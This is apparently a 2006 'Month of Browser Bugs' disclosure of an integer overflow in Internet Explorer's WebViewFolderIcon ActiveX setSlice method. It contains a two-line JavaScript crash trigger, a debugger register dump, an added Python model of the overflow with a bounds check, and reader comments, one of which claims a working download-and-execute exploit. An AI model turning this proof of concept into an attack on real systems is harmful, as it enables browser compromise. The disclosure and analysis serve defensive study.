MoBB #18: WebViewFolderIcon setSlice
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Calling the setSlice() method with the first argument set to 0x7fffffff triggers an invalid memory copy.
var a = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
a.setSlice(0x7fffffff, 0, 0x41424344, 0);
Demonstration
eax=00000010 ebx=001e4940 ecx=00000004
edx=7c97c0d8 esi=0013b188 edi=fffffff0
eip=773e0ba3 esp=0013b14c ebp=0013b158
comctl32!DSA_SetItem+0x60:
773e0ba3 f3a5 rep movsd ds:0013b188=41424344 es:fffffff0=????????
This bug will be added to the OSVDB:
Microsoft IE WebViewFolderIcon setSlice Integer Overflow
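As an added illustration (not part of the original post or of the control's code), the Python below models the pointer arithmetic that the register dump above implies: DSA_SetItem computes the destination of the copy as base + index * item_size, and with index 0x7fffffff and a 16-byte item (eax=00000010, ecx=4 dwords) the product wraps in 32-bit arithmetic to 0xfffffff0, the value seen in edi. The item size and the zero base are read off the dump and are assumptions, as are the helper names; the checked_offset function shows the bounds and multiplication checks a defensive implementation would need.

```python
# Added example: model of the 32-bit index*size wrap behind the setSlice crash.
# Assumptions: DSA_SetItem stores item `index` at base + index*item_size,
# the item size is 0x10 (eax=00000010 in the dump) and the base is 0.
from typing import Optional

MASK32 = 0xFFFFFFFF


def element_offset(index: int, item_size: int) -> int:
    """Byte offset of element `index` as a 32-bit machine computes it (truncated)."""
    return (index * item_size) & MASK32


def product_overflows(index: int, item_size: int) -> bool:
    """True when index*item_size does not fit in 32 bits, i.e. the offset is wrong."""
    return index * item_size > MASK32


def to_signed32(value: int) -> int:
    """Interpret a 32-bit pattern as a signed integer (why the result can look like -16)."""
    return value - (1 << 32) if value & 0x80000000 else value


def dest_pointer(base: int, index: int, item_size: int) -> int:
    """Destination of the rep movsd: base plus the (possibly wrapped) offset."""
    return (base + element_offset(index, item_size)) & MASK32


def checked_offset(index: int, count: int, item_size: int) -> Optional[int]:
    """Defensive version: reject out-of-range indexes and multiplications that would wrap.
    Returns None instead of an offset when the request is unsafe."""
    if index < 0 or index >= count:
        return None
    if index > MASK32 // item_size:
        return None
    return index * item_size


def reproduce_dump() -> dict:
    """Recompute the figures from the post's register dump (values taken from the page)."""
    index, item_size, base = 0x7FFFFFFF, 0x10, 0
    dst = dest_pointer(base, index, item_size)
    return {
        "edi": dst,                           # 0xFFFFFFF0 in the dump
        "wrapped": product_overflows(index, item_size),
        "signed_edi": to_signed32(dst),       # -16: the 'underflow' reading
        "dwords_copied": item_size // 4,      # ecx=4 in the dump
        # with one element allocated, a checked implementation refuses the index
        "checked": checked_offset(index, count=1, item_size=item_size),
    }


if __name__ == "__main__":
    for key, val in reproduce_dump().items():
        show = hex(val) if isinstance(val, int) and not isinstance(val, bool) and val >= 0 else val
        print(f"{key}: {show}")
```

The model is deliberately independent of the real comctl32 internals: it only reproduces the arithmetic consistent with the dump, which is enough to show why the index is an overflow to a huge unsigned offset rather than an underflow, and what check would have stopped it.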
19 Comments:
OSVDB calls this "integer underflow" but this looks more like an "integer overflow" to a very large negative number. What's your call? How would you define "integer underflow"?
I originally chose 'underflow' for some vague and probably not rational reason, overflow does make more sense in this context. A friend of mine confirmed that this bug is exploitable.
HDM, this is an overflow condition, and yes, it surely is exploitable. Let's hope that MS doesn't take their usual 6-month period to patch this one.
This works on IE 7.0 Beta 2 too!
Keep these ActiveX '0' day's coming - they totally vindicate my decision to implement 'ActiveX CLSID whitelisting' within the organisation I work for despite management whinging about ActiveX control and the perceived problems my approach would cause.
If only M$ would push the benefits of it more... they never recommend it as a 'workaround' to this sort of issue....
get a life people. instead of spending your days unethically looking for flaws in software to exploit, get off your butt and exercise. especially you hd moore.
Heh :-) Unethically? Explain.
What is object.setSlice used for? And why does only this WebViewFolderIcon.WebViewFolderIcon.1 ActiveX control cause the explorer crash? What is the use of object.setSlice?
This does not work on IE7+ / Vista 5472.
CERT posted this:
Public Exploit Code for Microsoft WebViewFolderIcon ActiveX Control Vulnerability
http://www.us-cert.gov/current/current_activity.html#exwbfldr
Hey guys!
http://www.us-cert.gov/current/index.html#exwbfldr
Please test this with XP's SP2 software DEP setting enabled with NO exceptions and tell me what happens.
IE6 SP2 asks me via the security bar if I want to run the following add-on, WebView shell. So SP2 protects me, because I can decide whether to run it or not and whether I trust this site.
IE7 is not vulnerable
STFU about telling homeboy he's unethical. He reported it, posted it, and is doing it in the right way. Do you know how many people land high-paying jobs doing exactly what he's doing? So stfu "MR. ANONYMOUS". You're a piece of s***
GJ Moore... keep up the good work!!!
get a life people. instead of spending your days posting comments anonymously, get off your butt and exercise. especially you anonymous commenter #5.
Does this affect XP SP2 with software DEP setting enabled with NO exceptions or not?
What is the point of these exploit posts if you are not going to provide answers to simple security questions?
Is the intention to provide better security or to simply get back at Microsoft?
It is a very simple question that I think someone should be able to provide.
Since this is such a simple question, please enable DEP with no exceptions, try the exploit, and post a comment with your results. The point of this exploit is to exploit systems using a bug found over three months ago. Exploits are useful for a variety of reasons (and to a wide range of people). If you don't find them useful, don't use them :-)
The setSlice sploit that I've got works splendidly with its download-and-execute shellcode when DEP is enabled.
nice work, HD.